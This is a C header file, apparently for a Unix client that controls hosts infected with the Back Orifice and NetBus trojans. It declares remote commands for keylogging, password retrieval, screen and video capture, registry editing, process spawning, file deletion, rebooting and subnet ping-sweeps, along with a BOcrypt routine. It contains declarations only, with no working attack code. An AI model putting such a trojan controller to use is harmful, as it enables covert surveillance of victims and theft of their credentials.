
#include "config.h"

#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#ifdef HAVE_ARPA_INET_H
#include <arpa/inet.h>
#endif
#include <errno.h>
#include <stdlib.h>
#include <stdio.h>
#ifdef HAVE_UNISTD_H
#include <unistd.h>
#endif
#ifdef HAVE_SYS_TIME_H
#include <sys/time.h>
#endif
#ifdef HAVE_SYS_SELECT_H
#include<sys/select.h>
#endif
#ifdef HAVE_STRINGS_H
#include<strings.h>
#endif
#ifdef HAVE_MALLOC_H
#include <malloc.h>
#endif
#include <netdb.h>
#include <string.h>
#include <ctype.h>
#ifdef WITH_READLINE
#include <readline/readline.h>
#endif
#ifdef HAVE_SIGNAL_H
#include <signal.h>
#endif
#include "wcommon.h"

#define COMMANDSIZE 512
#define ARGSIZE 256
#define SWEEPDELAY 4

#define TROJAN_NONE 0
#define TROJAN_BO 1
#define TROJAN_NB 2

#define NB_PORT 12345
#define NB_NO_DATA 0
#define NB_SERVER_DISCONNECTED -1
#define NB_NETWORK_ERROR -2

#define NBBUF_LEN 1024
#define NETBUSMAXCOM 4

#ifdef WORDS_BIGENDIAN
#define __EL_LONG(x) \
	((((x) >> 24) & 0x000000FF) | \
	 (((x) >> 8)  & 0x0000FF00) | \
	 (((x) << 8)  & 0x00FF0000) | \
	 (((x) << 24) & 0xFF000000))
#else
#define __EL_LONG(x) (x)
#endif

#define ALARM   2

#if SIZEOF_UNSIGNED_INT == 4
#define u32bit unsigned int
#elif SIZEOF_UNSIGNED_LONG == 4
#define u32bit unsigned long
#else
#error "Can't find type of data which is 32 bit long !"
#endif

#ifndef HAVE_IN_ADDR_T
#define in_addr_t unsigned long
#endif

#ifndef HAVE_IN_PORT_T
#define in_port_t int
#endif

struct COMMAND {
	char *cmd;		/* command */
	char *help;		/* command description/help */
	int type;		/* command type (one of CMD_* constants below) */
	int (*proc) (char *arg1, char *arg2);	/* command function */
};


#define CMD_NONE 0		/* No type */

/* BO command types */
#define CMD_BO_BASIC 1		/* Basic BO commands */
#define CMD_BO_FILE 2		/* File manipulating commands */
#define CMD_BO_DIR 3		/* Directory manipulating commands */
#define CMD_BO_SYS 4		/* System commands */
#define CMD_BO_NET 5		/* Network commands */
#define CMD_BO_PLUGIN 6		/* Plugin commands */
#define CMD_BO_PROCESS 7	/* Process commands */
#define CMD_BO_REG 8		/* Registry commands */
#define CMD_BO_MM 9		/* Multimedia commands */
#define CMD_BO_REDIR 10		/* Redirection commands */
#define CMD_BO_CON 11		/* Console application commands */

/* NB commands */
#define CMD_NB_BASIC 12		/* Basic NB commands */
#define CMD_NB_SYS 13		/* System commands */
#define CMD_NB_NET 14		/* Network commands */
#define CMD_NB_MM 15		/* Multimedia commands */



extern int trojanmode;
extern struct COMMAND bo_cmds[];
extern struct COMMAND nb_cmds[];


/* FUNCTIONS */
void msrand(unsigned int seed);
int mrand(void);
unsigned int getkey();
void BOcrypt(unsigned char *buff, int len);

extern void sig_alrm(int signo);

int pingsweepsubnet(char *arg1, int udpsock, int port);
int sendping(in_addr_t dest, in_port_t port, int sock);
int sendpacket(unsigned char type, const char *str1, const char *str2,
	       in_addr_t dest, in_port_t port, int sock);

int getpong(int sock);
int getinput(int sock);

void fixfilename(char *buff, const char *cwd, const char *path);
int executecommand(char *command, char *arg1, char *arg2);

void printhelp(void);
void givehelpcommand(char *arg1);

#ifdef WITH_READLINE
extern char *line_read;
char *rl_gets();
#endif

int new_host(char *hname, char *cport);
int init_netbus(char *host, int port);


extern struct COMMAND *get_commands(void);


/* COMMANDS */
/* Common */
int cmd_quit(char *arg1, char *arg2);
int cmd_mode(char *arg1, char *arg2);
int cmd_help(char *arg1, char *arg2);
/* BO */
int cmd_bo_host(char *arg1, char *arg2);
int cmd_bo_ping(char *arg1, char *arg2);
int cmd_bo_status(char *arg1, char *arg2);
int cmd_bo_dir(char *arg1, char *arg2);
int cmd_bo_cd(char *arg1, char *arg2);
int cmd_bo_del(char *arg1, char *arg2);
int cmd_bo_copy(char *arg1, char *arg2);
int cmd_bo_find(char *arg1, char *arg2);
int cmd_bo_freeze(char *arg1, char *arg2);
int cmd_bo_melt(char *arg1, char *arg2);
int cmd_bo_view(char *arg1, char *arg2);
int cmd_bo_md(char *arg1, char *arg2);
int cmd_bo_rd(char *arg1, char *arg2);
int cmd_bo_info(char *arg1, char *arg2);
int cmd_bo_passes(char *arg1, char *arg2);
int cmd_bo_dialog(char *arg1, char *arg2);
int cmd_bo_netview(char *arg1, char *arg2);
int cmd_bo_netlist(char *arg1, char *arg2);
int cmd_bo_netconnect(char *arg1, char *arg2);
int cmd_bo_netdisconnect(char *arg1, char *arg2);
int cmd_bo_proclist(char *arg1, char *arg2);
int cmd_bo_prockill(char *arg1, char *arg2);
int cmd_bo_procspawn(char *arg1, char *arg2);
int cmd_bo_passwd(char *arg1, char *arg2);
int cmd_bo_ren(char *arg1, char *arg2);
int cmd_bo_resolve(char *arg1, char *arg2);
int cmd_bo_sharelist(char *arg1, char *arg2);
int cmd_bo_shareadd(char *arg1, char *arg2);
int cmd_bo_sharedel(char *arg1, char *arg2);
int cmd_bo_keylog(char *arg1, char *arg2);
int cmd_bo_regmakekey(char *arg1, char *arg2);
int cmd_bo_regdelkey(char *arg1, char *arg2);
int cmd_bo_regdelval(char *arg1, char *arg2);
int cmd_bo_reglistkeys(char *arg1, char *arg2);
int cmd_bo_reglistvals(char *arg1, char *arg2);
int cmd_bo_regsetval(char *arg1, char *arg2);
int cmd_bo_listcaps(char *arg1, char *arg2);
int cmd_bo_capframe(char *arg1, char *arg2);
int cmd_bo_capavi(char *arg1, char *arg2);
int cmd_bo_capscreen(char *arg1, char *arg2);
int cmd_bo_sound(char *arg1, char *arg2);
int cmd_bo_redirlist(char *arg1, char *arg2);
int cmd_bo_rediradd(char *arg1, char *arg2);
int cmd_bo_redirdel(char *arg1, char *arg2);
int cmd_bo_applist(char *arg1, char *arg2);
int cmd_bo_appadd(char *arg1, char *arg2);
int cmd_bo_appdel(char *arg1, char *arg2);
int cmd_bo_httpon(char *arg1, char *arg2);
int cmd_bo_httpoff(char *arg1, char *arg2);
int cmd_bo_sweep(char *arg1, char *arg2);
int cmd_bo_sweeplist(char *arg1, char *arg2);
int cmd_bo_pinglist(char *arg1, char *arg2);
int cmd_bo_reboot(char *arg1, char *arg2);
int cmd_bo_tcpsend(char *arg1, char *arg2);
int cmd_bo_tcprecv(char *arg1, char *arg2);
int cmd_bo_lockup(char *arg1, char *arg2);
int cmd_bo_pluginexec(char *arg1, char *arg2);
int cmd_bo_pluginkill(char *arg1, char *arg2);
int cmd_bo_pluginlist(char *arg1, char *arg2);
/* NB */
int cmd_nb_host(char *arg1, char *arg2);
int cmd_nb_close(char *arg1, char *arg2);
int cmd_nb_info(char *arg1, char *arg2);
int cmd_nb_listen(char *arg1, char *arg2);
int cmd_nb_cdeject(char *arg1, char *arg2);
int cmd_nb_cdclose(char *arg1, char *arg2);
int cmd_nb_swapbuttons(char *arg1, char *arg2);
int cmd_nb_send(char *arg1, char *arg2);
int cmd_nb_url(char *arg1, char *arg2);
int cmd_nb_startapp(char *arg1, char *arg2);
int cmd_nb_keys(char *arg1, char *arg2);



/* STRUCTURES */

struct packlink {
	int size;
	unsigned long id;
	void *data;
	unsigned long host;
	struct packlink *prev;
	struct packlink *next;
};



/* memwatch debugging support */
#ifdef MEMWATCH
#include "memwatch.h"
#endif
